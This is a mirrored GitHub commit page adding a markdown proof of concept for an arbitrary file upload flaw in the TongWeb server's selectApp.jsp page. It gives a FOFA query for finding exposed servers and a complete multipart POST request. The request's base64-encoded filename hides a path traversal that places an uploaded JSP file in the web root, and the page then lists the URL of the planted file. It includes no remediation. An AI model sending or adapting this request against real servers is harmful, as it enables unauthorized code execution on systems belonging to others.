crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:34:54 +08:00
Code Issues Packages Projects Releases Wiki Activity

Create 东方通TongWeb-selectApp.jsp存在任意文件上传.md

Browse Source
This commit is contained in:
wy876 2024-04-07 18:40:32 +08:00 committed by GitHub
parent d7a7bc577e
commit a331a133a2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 35 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
东方通TongWeb-selectApp.jsp存在任意文件上传.md Normal file
View File

@ -0,0 +1,35 @@
## 东方通TongWeb-selectApp.jsp存在任意文件上传
## fofa
```
header="TongWeb Server" || banner="Server: TongWeb Server"
```
## poc
```
POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c
User-Agent: Mozilla/5.0
--fa2ef860e94d564632e291131d20064c
Content-Disposition: form-data; name="app_fileName"
Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw
--fa2ef860e94d564632e291131d20064c
Content-Disposition: form-data; name="app"
--fa2ef860e94d564632e291131d20064c
Content-Disposition: form-data; name="className"
test
--fa2ef860e94d564632e291131d20064c
Content-Disposition: form-data; name="uploadApp"; filename="test.jar"
Content-Type: application/java-archive
<% out.println(16156223+223415616); %>
--fa2ef860e94d564632e291131d20064c--
```
文件上传路径:`http://ip/heimdall/123qwe1.jsp`